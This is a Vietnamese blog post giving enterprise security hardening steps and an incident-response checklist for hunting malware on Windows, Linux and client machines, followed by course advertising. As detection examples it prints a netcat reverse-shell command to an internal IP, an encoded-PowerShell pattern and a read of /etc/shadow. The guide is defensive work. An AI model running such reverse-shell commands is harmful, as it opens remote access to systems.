Thứ Sáu, 12 tháng 4, 2024

[VIP5] Hướng dẫn đảm bảo An toàn thông tin tại các Doanh nghiệp

Đối với các hệ thống được giao, đặc biệt ưu tiên các hệ thống TRỌNG YẾU, các hệ thống có NGUY CƠ cao các đơn vị cần thực hiện cho từng hệ thống cụ thể:

- Triển khai khẩn cấp các giải pháp sao lưu/ phục hồi (backup/restore), đảm bảo hệ thống phải có bản sao lưu toàn phần (backup full) thành công, được lưu trữ tách biệt với hệ thống được backup, nơi lưu trữ phải đảm bảo an toàn, có giới hạn truy cập, giới hạn quyền tác động vào dữ liệu backup.

- Trong trường hợp không đủ tài nguyên, đơn vị chủ động sử dụng nguồn chi phí để triển khai các giải pháp backup offline (đảm bảo có bản backup dữ liệu offline cho các hệ thống trọng yếu do đơn vị quản lý). Tuân thủ theo các quy định của Doanh nghiệp.

- Rà soát, xây dựng ngay kịch bản phục hồi (restore) từ dữ liệu backup để đảm sẵn sàng sử dụng cho kịch bản bị tấn công, phải khôi phục hệ thống.

- Triển khai các biện pháp Gia cố hệ thống theo Phụ lục I.

- Triển khai các biện pháp rà soát, phát hiện loại bỏ Malware, Keyloger trên các máy tính của Đội ngũ Quản trị/ Nhân viên kỹ thuật theo phụ lục II.

Phụ lục I

CÁC BIỆN PHÁP GIA CỐ HỆ THỐNG 

- Thực hiện rà soát gia cố LỚP TRUY CẬP, TÀI KHOẢN đảm bảo các yêu cầu sau:

    * *Thực hiện đổi mật khẩu các tài khoản quản trị, đảm bảo mật khẩu khác nhau giữa các hệ thống, TRÁNH dùng chung 1 mật khẩu, KHÔNG sử dụng chung 1 quy luật sinh mật khẩu.

    * Thực hiện cấu hình xác thực 2 yếu tố (2FA) đối với các tài khoản quản trị

    * Triển khai các kết nối quản trị qua hệ thống giám sát tài khoản đặc quyền SCB/CYBER ARK, sử dụng VDI/JumStart server để kết nối vào hệ thống máy chủ.

    * *Nghiêm cấm các kết nối quản trị trực tiếp từ máy tính người dùng đến thẳng máy chủ. 

- Thực hiện rà soát gia cố lớp ỨNG DỤNG/WEB/MIDDLEWARE

    * *Kiểm tra các ứng dụng/service web không sử dụng, thực hiện shutdown, stop các service/web mặc định không dùng.

    * *Kiểm tra các tài khoản mặc định khi cài đặt ứng dụng, thực hiện đổi mật khẩu sang mật khẩu mạnh. Thực hiện disable/ vô hiệu hoá các tài khoản không dùng. Đặc biệt các tài khoản quản trị website/webserver.

    * *Rà soát file tham số, Cấu hình loại bỏ các giao thức cũ, có nhiều lỗ hổng bảo mật đã không được sử dụng: SSL/TLS

    * Tuỳ theo phiên bản web server của đơn vị (nginx, apache, tomcat, IIS …) thực hiện các giải pháp gia cố web tương ứng (HARDENING WEBSEVER)

    * Rà soát các CVE nguy cơ cao trở lên, các CVE đã có tool khai thai thác để kịp thời cập nhật bản vá nhằm khắc phục hoặc đề xuất tạm thời cách ly, không khai thác, hoặc khai thác hạn chế.

- Thực hiện rà soát gia cố lớp DATABASE

    * *Thực hiện đổi mật khẩu các tài khoản quản trị có quyền DBA/SYS/BACKUP

    * *Disable/ Vô hiệu hoá các tài khoản mặc định ko sử dụng có kèm theo hệ thống của hãng cung cấp.

    * *Triển khai giới hạn IP truy cập đối với các tài khoản quản trị có quyền DBA/SYS/BACKUP

    * Rà soát các nhóm quyền DBA/Role/Privilege có quyền cập nhật dữ liệu/ truy vấn dữ liệu hàng hoạt (any table,...), các user có quyền thực thi các package/procedure/function  để kịp thời phát hiện và điều chỉnh giới hạn phân quyền. 

- Thực hiện rà soát gia cố lớp MẠNG/FIREWALL/VPN

    * *Thực hiện đổi mật khẩu quản trị các thiết bị mạng, Firewall, Router, Core Switch, VPN.

    * *Thực hiện disable/ vô hiệu các tài khoản mặc định kèm theo thiết bị mà không sử dụng.

    * Lên kế hoạch và áp dụng 2FA cho các tài khoản quản trị.

    * Phân hoạch lớp mạng quản trị riêng cho các kết nối quản trị (Console/OAM) theo từng loại thiết bị/ theo vùng thiết bị để hạn chế việc truy cập từ bên ngoài và hạn chế vùng nguy cơ.

    * Triển khai các máy chủ JumStart cho các loại kết nối quản trị. Giới hạn việc truy cập quản trị chỉ được kết nối từ các máy chủ JumStart hoặc thiết bị tin cậy, dành riêng.

    * *Rà soát các Rules trên Firewall/VPN server để giới hạn các kết nối vào phân vùng hệ thống, hạn chế các rules mở any/any; mở toàn dải mạng,.. 

- Thực hiện gia cố lớp OS (Hệ điều hành)

    * *Triển khai giới hạn truy cập IP được sử dụng giao thức SSH để truy cập vào hệ thống.

    * *Loại bỏ các port/service ko sử dụng (Telnet/ Web server/FTP/DNS, X-Forwarding...)

    * *Bật tính năng chống BruteForce password, quá 5 lần sai sẽ hạn chế tài khoản và cảnh báo

    * Triển khai bật log truy cập, gửi log cảnh báo khi user root/user có quyền quản trị login thành công.

    * Thực hiện giới hạn user root/ user quản trị truy cập SSH trực tiếp. Yêu cầu dùng user thường khi kết nối và tăng quyền lên root.

    * Triển khai áp dụng 2FA nếu HĐH đáp ứng.

    * *Rà soát các nhóm quyền root/administrator để rà soát loại bỏ các user có quyền root/ quyền admin hệ thống.

Chú thích:

Các công việc có nhiều (*)  là việc ưu tiên cần thực hiện trước


Phụ lục III

CÁC BIỆN PHÁP RÀ SOÁT, PHÁT HIỆN LOẠI BỎ MALWARE, KEYLOGER TRÊN CÁC MÁY TÍNH CỦA ĐỘI NGŨ QUẢN TRỊ/ NHÂN VIÊN KỸ THUẬT   

1. Check list kiểm tra cho máy windows (PC, Jump, Server)

Các bước thực hiện:
B1: Vào thư mục %SystemRoot%\System32\Winevt\Logs tiến hành copy toàn bộ logs về máy tính của mình.
B2: Tiến hành kiểm tra Service, Process, File trên máy chủ cần kiểm tra.
B3: Sau khi hoàn thành B2, tiến hành quay lại kiểm tra logs đã copy.

No

Step

Tools

Signature

Kiểm tra windows event logs (Event Viewer)

1

Kiểm tra logs về service

Windows Logs -> System: EventID 7045

Nếu thấy các service lạ VD: Tên ngẫu nhiên, có các param hay commandline chạy câu lệnh, ….
Đặc biệt có các service psexec.. Thông báo

2

Kiểm tra logs về xóa logs

Windows Logs -> System: EventID 104
Windows Logs -> Security: EventID 1102

Nếu phát hiện thấy bất kỳ máy tính nào có 2 loại logs trên phải thông báo lại ngay

3

Kiểm tra logs về stop Service Event log

Windows Logs -> Application and Service Logs -> Microsoft -> Winlogon: EventID 6006

Nếu phát hiện có log EventID 6006 cần thông báo lại ngay

4

Kiểm tra logs về Process

Windows Logs -> Security: EventID 4688

Nếu phát hiện các process chạy với commandline bất thương thông báo lại ngay

5

Kiểm tra logs về powershell

Windows Logs -> Application and Service Logs -> Windows Powershell
:800, 600
Windows Logs -> Application and Service Logs -> Microsoft -> Windows -> Powershell: 410x

Tìm kiếm các command line powershell nghi vấn: powershell -enc ….

6

Kiểm tra log về Registry

Windows Logs -> Security: EventID 4657

Một số Registry cần chú ý
a. Changes to AppInit_Dlls - reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v
AppInit_Dlls
b. Changes to Services Keys - reg query "HKLM\System\CurrentControlSet\Services"
c. Changes to Machine Run Key - reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run”
d. Changes to Machine RunOnce Key - reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce”
e. Changes to User Run Key - reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run”
f. Changes to User RunOnce Key - reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce”

7

Kiểm tra logs về thay đổi file trong hệ thống (File Integrity Monitoring)

Windows Logs -> Security: EventID 4663

Kiểm tra các thay đổi file, về create, delete file, chú ý tên file và thời gian thay đổi file, confirm lại với quản trị viên chịu trách nhiệm

8

Kiểm tra về logs net share

Windows Logs -> Security: EventID 5140/5145

Kiểm tra các lịch sử share resource, note lại và confirm và quản trị viên chịu trách nhiệm

9

Kiểm tra logs về WMI

Windows Logs -> Security: EventID 5861

Kiểm tra các log connect của WMI từ máy khác, note lại các kết nối và confirm lại với quản trị viên chịu trách nhiệm

10

Kiểm tra logs về taskschedule

Windows Logs ->  Application and Service Logs -> Windows ->Microsoft -> TaskScheduler ( Chú ý eventid 106 tạo taskscheduler)

Kiểm tra lại các taskscheduler, nếu thấy các taskschedule lạ được khởi tạo và xóa thì báo lại cho quản trị viên để confirm. Các schedule  nằm trong thư mục %WINDIR%Tasks,  %WINDIR%System32\Tasks xuất hiện các tệp tin At1.job,.....

11

Kiểm tra các logs liên quan đến sử dụng thực thi SeTcbPrivilege

Windows Logs -> Security: EventID 4703

Kiểm tra process thwujc thi, người thực thi và thông bào và confirm lại

12

Kiểm tra logs liên quan đến đang nhập

Windows Logs -> Security: EventID 4624

Kiểm tra và thống kê logs đăng nhập trên hệ thống, và gửi lại quản trị viên để confirm các lịch sử đăng nhập này xác nhận truy cập.
Chú ý các logon type 3 là Network Logon, type 5 là Service Logon, type 10 là RDP Logon.

13

Kiểm tra tấn công bruteforce

Windows Logs -> Security: EventID 4625

Kiểm tra và thống kê nếu số lượng tần suất logs login fail(4625) nhiều (>10) thì thông báo lại xác định nguồn truy cập

14

Kiểm tra logs liên quan đến thay đổi user

Windows Logs -> Security: EventID 4738/4726

 

15

Kiểm tra logs liên quan đến thay đổi groups

Windows Logs -> Security: EventID 4727/4734

 

16

Kiểm tra logs truy cập đến AD Object hoặc SAM (Security Account Manager) Object

Windows Logs -> Security: EventID 4661

Kiểm tra yêu cầu truy cập đến AD hoặc SAM Object. Nếu có log EventID 4661 cần thông báo lại ngay.

17

Kiểm tra logs thay đổi thời gian hệ thống

Windows Logs -> Security: EventID 4616

Kiểm tra logs về thay đổi thời gian hệ thống. Nếu có log EventID 4616 cần thông báo lại ngay.

Kiểm tra máy bằng bộ công cụ SysinternalSuite & ProcessHacker

1

Kiểm tra malware, rootkit

TDSSKiller

 

2

Kiểm tra các service chạy trên hệ thống

Manual

Hoặc chạy command line: – sc.exe query state= all

Mở Run(Windows + R) -> services.msc
Kiểm tra tất cả các service đang chạy nếu có service nào tên khả nghi hay có các param chạy lạ note lại và thông báo
  service run PSEXESVC.EXE 

3

Kiểm tra các process đang chạy trên máy tính

Process Hacker & procexp64

Đối với procexp64:
Chọn Options-> Verify Signature và check with virustotal
Chọn "View Dlls"

Kiểm tra signature và dùng check virustotal
Đặc biệt tập trung vào các process và sub-process là cmd hoặc powershell

Nếu thấy các process và sub-process là cmd hoặc powershell cần xem các command line được execute

xem có process tên là scrcons.exe
Đối với process hacker:
Cũng như procexp64 tuy nhiên thực hiện kiểm tra inject memory bằng cách kiểm chuột phải vào các process đang chạy chọn tab "memory" kiểm tra xem tab "protection" xem có loại nào là "RWX" không nếu có click dup vào kiểm tra phía string có dòng nào "Program ...."

4

Check Autorun

Autoruns

Đối với Autoruns
Chọn Options-> Verify Signature và check with virustotal
kiểm tra các file process dll không có signature hoặc bị virustotal phát hiện

Check các registry đang có trong hệ thống.

check các driver các signature của từng driver và các tab khác trong autorun đều vậy à
check cả phần wmi để xem có wmi backdoor
Trong tab Schedule task kiểm tra các schedule lạ, nghi vấn

5

Kiểm tra Task Schedule

Task Schedule

Kiểm tra toàn bộ task schedule đang có

6

Kiểm tra connetion

TCPView

Mở TCPView kiểm tra các kết nối của máy chủ, cần verify lại các ip và port connect ra phía ngoài hoặc ra trong nội bộ

7

Kiểm tra User và Group

Manual

Kiểm tra và check lại với đội ngũ quản trị với các User và group đang có (Tập trung vào các user trong group administrator)

8

Kiểm tra các file được chia sẻ trên máy

Command line:
net view \\127.0.0.1
net session
net use

Kiểm tra các lịch sử share resource, note lại và confirm và quản trị viên chịu trách nhiệm

9

Kiểm tra các ứng dụng đang được cài đặt trên máy

Manual

Control Pannel -> Programs and Features
Kiểm tra các ứng dụng được cài đặt và confirm lại với quản trị viên với một số ứng dụng la, hay cho phép remote truy cập.
Powershell: Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table –AutoSize

10

Rà soát tunnel

+ netsh interface portproxy show all
+ Nếu có tunnel: export registry dạng text: HKLM\SYSTEM\CurrentControlSet\Services\PortProxy

+Kiểm tra:
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY
HKEY_CURRENT_USER\SoftWare\SimonTatham\PuTTY\SshHostKeys
+RDP tunneling:
Check log %systemroot%\Windows\System32\winevt\Logs\Microsoft-TerminalServices-LocalSessionmanager%3Operational.evtx (eventID 21 và 25).
Check log: %systemroot%\Windows\System32\winevt\Logs\Security.evtx, event 4624 - logon type = 10.
Kiểm tra tồn tại file plink.exe (chú ý có thể với filename khác)

 

11

Kiểm tra các malware & webshell được cài trong máy

Manual
Sử dụng công cụ sigcheck trong bộ SysInternal

Thực hiện kiểm tra các thư mục
C:\Windows
C:\Windows\Temp
C:\Windows\System32
Downloads, Documents, User/AppData, ...

Sử dụng sigcheck để kiểm tra các file chưa được ký trong các thư mục: https://docs.microsoft.com/en-us/sysinternals/downloads/sigcheck.
Ví dụ: kiểm tra các file executable không được ký trong thư mục C:\Windows\System32: sigcheck -u -e c:\windows\system32

Tích vào "Shown hidden files and folders" để hiển thị file bị ẩn.
Kiểm tra modified file: https://www.windows-commandline.com/find-files-based-on-modified-time/
-Find files modified in the last 7 days: forfiles /P directory /S /D +(today'date - 30 days)
-Find files that were last modified 1 month back: forfiles /P directory /S /D -30

Dấu hiện nhận biết ở đây là các file nghi vấn VD: DUMP, tên ngẫu nhiên, ...

Để tăng tốc độ, dùng sort date modified để sort theo các file mới nhất. Lưu ý các trường Date modified, Date created và Owner của file.

Việc checkwebshell cũng tương tự cần xác định thư mục chứa web và kiểm tra các file trong đó theo trình tự thời gian

12

Kiểm tra named pipe

Sử dụng công cụ Process Explorer,PipeList  và Accesschk (Cùng trong SysInternal)

với Accesschk64.exe sử dụng command Acesschk64.exe \pipe\ với quyền Administrator . Nếu tìm thấy pipe lạ chứa các chuỗi ngẫu nhiên . Bật options "Find handle and dll" trong procexp để kiểm tra xem tiến trình nào sử dung pipename

Kiểm tra thêm bằng các file trên windows

1

Export registry để thực hiện phân tích thêm

Sử dụng "Registry Editor", chuột phải chọn "Computer" và click vào "Export"

Kiểm tra các entry nghi ngờ trong "Software\". Ví dụ: Software\Sysinternals\PsExec.

2

Copy file "C:\Windows\appcompat\Programs\Amcache.hve" để phân tích thêm

 

Amcache.hve file là registry file lưu trữ thông tin các chương trình được thực thi trên máy, bao gồm đường dẫn file thực thi, thời điểm thực thi ban đầu, thời điểm xóa file, lần cài đặt đầu tiên của chương trình.
Công cụ đọc file "AmcacheParser" tại https://ericzimmerman.github.io/#!index.md

3

Copy Prefetch folder từ đường dẫn "%SystemRoot%\Prefetch"

 

Prefetch files bao gồm nhiều metadata, như: tên file thực thi, số lần chạy, thông tin volume, tệp tin và thư mục liên quan, thời gian chạy.
Sử dụng công cụ "PECmd", ...

4

Copy file lịch sử  lệnh chạy powershel  tại đường dẫn "C:\Users\Username\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt"

 

Đọc thư mục để kiểm tra các lệnh nghi ngờ đã chạy trên powershell

 

*Note: Khi sử dụng các công cụ, phải chạy bằng "Run as Administrator"

Tham khảo trang wiki mục "Windows intrusion analysis" Sẽ được đi kèm với bản checklist này để thực hiện các công cụ

2. Check list kiểm tra cho máy Linux (Server)

No

Step

Command line

Signature

Kiểm tra máy bằng bộ công cụ SysinternalSuite & ProcessHacker

1

Kiểm tra các process đang chạy trên máy tính

Sử dụng lệnh ps -aux hoặc ps -e

đối với process trong Linux mọi người có thể nhìn rõ ràng các command line một số process đang chạy, chú ý các commandline khả nghi để tạo connect VD:
nc -e /bin/bash 192.168.1.1 8888

và một số process tên nghi vấn hoặc nằm thư mục khác /opt/ /tmp /usr/mail

2

Check service

Tìm kiếm trong thư mục:
/etc/systemd/system

/usr/lib/systemd/system

/lib/systemd/system

hoặc dùng câu lệnh

chkconfig --list

Đối với Autoruns
Chọn Options-> Verify Signature và check with virustotal
kiểm tra các file process dll không có signature hoặc bị virustotal phát hiện

Trong tab Schedule task kiểm tra các schedule lạ, nghi vấn

3

Kiểm tra Task Schedule

crontab -l hoặc tìm trong các thư mục:
/etc/cron.da ly
/etc/cron.weekly
/etc/cron.daily

Kiểm tra toàn bộ crontab đang có

5

Kiểm tra connetion

netstat -an
hoặc
netstat -N
hoặc
lsof -i

Kiểm tra các kết nối của máy chủ, cần verify lại các ip và port connect ra phía ngoài hoặc ra trong nội bộ

6

Kiểm tra User và Group

cat /etc/passwd
cat /etc/group
cat /etc/shadow

Kiểm tra thông tin trong tệp
/etc/passwd
/etc/group
/etc/shadow

6

Kiểm tra các malware & file nghi lạ nghi vấn

find / -user root -perm -4000 -print 2>/dev/null
find / -uid 0
find / -size +1G (Tìm các file có nội dung lớn 1Gb)



Dấu hiện nhận biết ở đây là các file nghi vấn VD: DUMP, tên ngẫu nhiên,

7

Kiểm tra các file bị hủy

lsof +L1

Dấu hiện nhận biết ở đây là các file nghi vấn VD: DUMP, tên ngẫu nhiên,

8

Kiểm tra rootkit

chkrootkit

Sử dụng chkrootkit check rootkit trên hệ thống

8

Kiểm tra thông tin log

/var/log/message: Thông báo chung và nội dung liên quan đến hệ thống
  /var/log/auth.log: Log chứa thông tin xác thực
  /var/log/kern.log: Log chứa thông tin hoạt động của nhân Linux
  /var/log/cron.log: Log chứa thông tin công việc định kỳ
  /var/log/maillog: Log chứa thông tin máy chủ mail
  /var/log/httpd/: Log chứa thông tin truy cập và lỗi của Apache
  /var/log/boot.log: Log chứa thông tin khởi động hệ thống
  /var/log/mysqld.log: Log chứa thông tin máy chủ cơ sở dữ liệu MySQL
  /var/log/secure: Log chứa thông tin xác thực
  /var/log/utmp or /var/log/wtmp: Tệp ghi thông tin đăng nhập
  


3. Check list cho client (PC, Jump)

No

Step

Osquery command

Signature

Kiểm tra windows event logs (Event Viewer)

1

Kiểm tra logs về service

check services
  Check services installed

Nếu thấy các service lạ VD: Tên ngẫu nhiên, có các param hay commandline chạy câu lệnh, ….
Đặc biệt có các service psexec.. Thông báo

2

Kiểm tra logs về xóa logs

Check clear logs

Nếu phát hiện thấy bất kỳ máy tính nào có 2 loại logs trên phải thông báo lại ngay

3

Kiểm tra logs về Process

Check Process connection

Nếu phát hiện các process chạy với commandline bất thương thông báo lại ngay

4

Kiểm tra logs về powershell

Check powershell

Tìm kiếm các command line powershell nghi vấn: powershell -enc ….

Kiểm tra máy bằng bộ công cụ SysinternalSuite & ProcessHacker

1

Kiểm tra các process đang chạy trên máy tính

Check Process connection

Đối với procexp64:
Chọn Options-> Verify Signature và check with virustotal
Chọn "View Dlls"

Kiểm tra signature và dùng check virustotal
Đặc biệt tập trung vào các process và sub-process là cmd hoặc powershell

Nếu thấy các process và sub-process là cmd hoặc powershell cần xem các command line được execute


Đối với process hacker:
Cũng như procexp64 tuy nhiên thực hiện kiểm tra inject memory bằng cách kiểm chuột phải vào các process đang chạy chọn tab "memory" kiểm tra xem tab "protection" xem có loại nào là "RWX" không nếu có click dup vào kiểm tra phía string có dòng nào "Program ...."

2

Check Autorun

check autorun

chiều

3

Kiểm tra Task Schedule

Check Task Schedule

Kiểm tra toàn bộ task schedule đang có

4

Kiểm tra connetion

Check Process connection

Mở TCPView kiểm tra các kết nối của máy chủ, cần verify lại các ip và port connect ra phía ngoài hoặc ra trong nội bộ

5

Kiểm tra User và Group

List Groups
List Users

Kiểm tra và check lại với đội ngũ quản trị với các User và group đang có (Tập trung vào các user trong group administrator)

6

Kiểm tra ứng dụng đang cài trên máy

Check programs

Kiểm tra và check lại với đội ngũ quản trị với các User và group đang có (Tập trung vào các user trong group administrator)

7

Kiểm tra các file được chia sẻ trên máy

Check Share resources

 

=============================
Website không bao giờ chứa bất kỳ quảng cáo nào, mọi đóng góp để duy trì phát triển cho website (donation) xin vui lòng gửi về STK 90.2142.8888 - Ngân hàng Vietcombank Thăng Long - TRAN VAN BINH
=============================
Nếu bạn muốn tiết kiệm 3-5 NĂM trên con đường trở thành DBA chuyên nghiệp thì hãy đăng ký ngay KHOÁ HỌC ORACLE DATABASE A-Z ENTERPRISE, được Coaching trực tiếp từ tôi với toàn bộ kinh nghiệm, thủ tục, quy trình, bí kíp thực chiến mà bạn sẽ KHÔNG THỂ tìm kiếm trên Internet/Google giúp bạn dễ dàng quản trị mọi hệ thống Core tại Việt Nam và trên thế giới, đỗ OCP.
- CÁCH ĐĂNG KÝ: Gõ (.) hoặc để lại số điện thoại hoặc inbox https://m.me/tranvanbinh.vn hoặc Hotline/Zalo 090.29.12.888
- Chi tiết tham khảo:
https://bit.ly/oaz_w
=============================
2 khóa học online qua video giúp bạn nhanh chóng có những kiến thức nền tảng về Linux, Oracle, học mọi nơi, chỉ cần có Internet/4G:
- Oracle cơ bản: https://bit.ly/admin1_1200
- Linux: https://bit.ly/linux_1200
=============================
KẾT NỐI VỚI CHUYÊN GIA TRẦN VĂN BÌNH:
📧 Mail: binhoracle@gmail.com
☎️ Mobile/Zalo: 0902912888
👨 Facebook: https://www.facebook.com/BinhOracleMaster
👨 Inbox Messenger: https://m.me/101036604657441 (profile)
👨 Fanpage: https://www.facebook.com/tranvanbinh.vn
👨 Inbox Fanpage: https://m.me/tranvanbinh.vn
👨👩 Group FB: https://www.facebook.com/groups/DBAVietNam
👨 Website: https://www.tranvanbinh.vn
👨 Blogger: https://tranvanbinhmaster.blogspot.com
🎬 Youtube: https://www.youtube.com/@binhguru
👨 Tiktok: https://www.tiktok.com/@binhguru
👨 Linkin: https://www.linkedin.com/in/binhoracle
👨 Twitter: https://twitter.com/binhguru
👨 Podcast: https://www.podbean.com/pu/pbblog-eskre-5f82d6
👨 Địa chỉ: Tòa nhà Sun Square - 21 Lê Đức Thọ - Phường Mỹ Đình 1 - Quận Nam Từ Liêm - TP.Hà Nội

=============================
oracle tutorial, học oracle database, Tự học Oracle, Tài liệu Oracle 12c tiếng Việt, Hướng dẫn sử dụng Oracle Database, Oracle SQL cơ bản, Oracle SQL là gì, Khóa học Oracle Hà Nội, Học chứng chỉ Oracle ở đầu, Khóa học Oracle online,sql tutorial, khóa học pl/sql tutorial, học dba, học dba ở việt nam, khóa học dba, khóa học dba sql, tài liệu học dba oracle, Khóa học Oracle online, học oracle sql, học oracle ở đâu tphcm, học oracle bắt đầu từ đâu, học oracle ở hà nội, oracle database tutorial, oracle database 12c, oracle database là gì, oracle database 11g, oracle download, oracle database 19c, oracle dba tutorial, oracle tunning, sql tunning , oracle 12c, oracle multitenant, Container Databases (CDB), Pluggable Databases (PDB), oracle cloud, oracle security, oracle fga, audit_trail,oracle RAC, ASM, oracle dataguard, oracle goldengate, mview, oracle exadata, oracle oca, oracle ocp, oracle ocm , oracle weblogic, postgresql tutorial, mysql tutorial, mariadb tutorial, ms sql server tutorial, nosql, mongodb tutorial, oci, cloud, middleware tutorial, hoc solaris tutorial, hoc linux tutorial, hoc aix tutorial, unix tutorial, securecrt, xshell, mobaxterm, putty

ĐỌC NHIỀU

Trần Văn Bình - Oracle Database Master